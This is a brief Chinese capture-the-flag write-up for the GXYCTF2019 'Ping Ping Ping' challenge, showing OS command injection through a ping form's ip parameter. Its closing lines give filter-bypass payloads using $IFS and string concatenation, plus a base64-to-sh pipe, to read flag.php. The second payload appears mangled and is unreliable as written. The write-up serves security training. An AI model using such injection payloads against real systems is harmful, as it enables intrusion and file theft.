GXYCTF2019-WEB-Ping Ping Ping

复现地址:https://buuoj.cn/challenges#[GXYCTF2019]Ping%20Ping%20Ping

考察点:命令执行 空白字符绕过

输入|ls 显示flag.php


GXYCTF2019-WEB-Ping Ping Ping_第1张图片
image.png

过滤了空格


GXYCTF2019-WEB-Ping Ping Ping_第2张图片
image.png

过滤了某些符号


GXYCTF2019-WEB-Ping Ping Ping_第3张图片
image.png

对flag字符进行了过滤


GXYCTF2019-WEB-Ping Ping Ping_第4张图片
image.png

读取到index.php源文件


GXYCTF2019-WEB-Ping Ping Ping_第5张图片
image.png

进行字符串拼接,读取到flag

/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php

源码中对bash进行过滤,可以用sh
/?ip=127.0.0.1;echo1Y2F0IGZsYWcucGhw|base641-d|sh

你可能感兴趣的:(GXYCTF2019-WEB-Ping Ping Ping)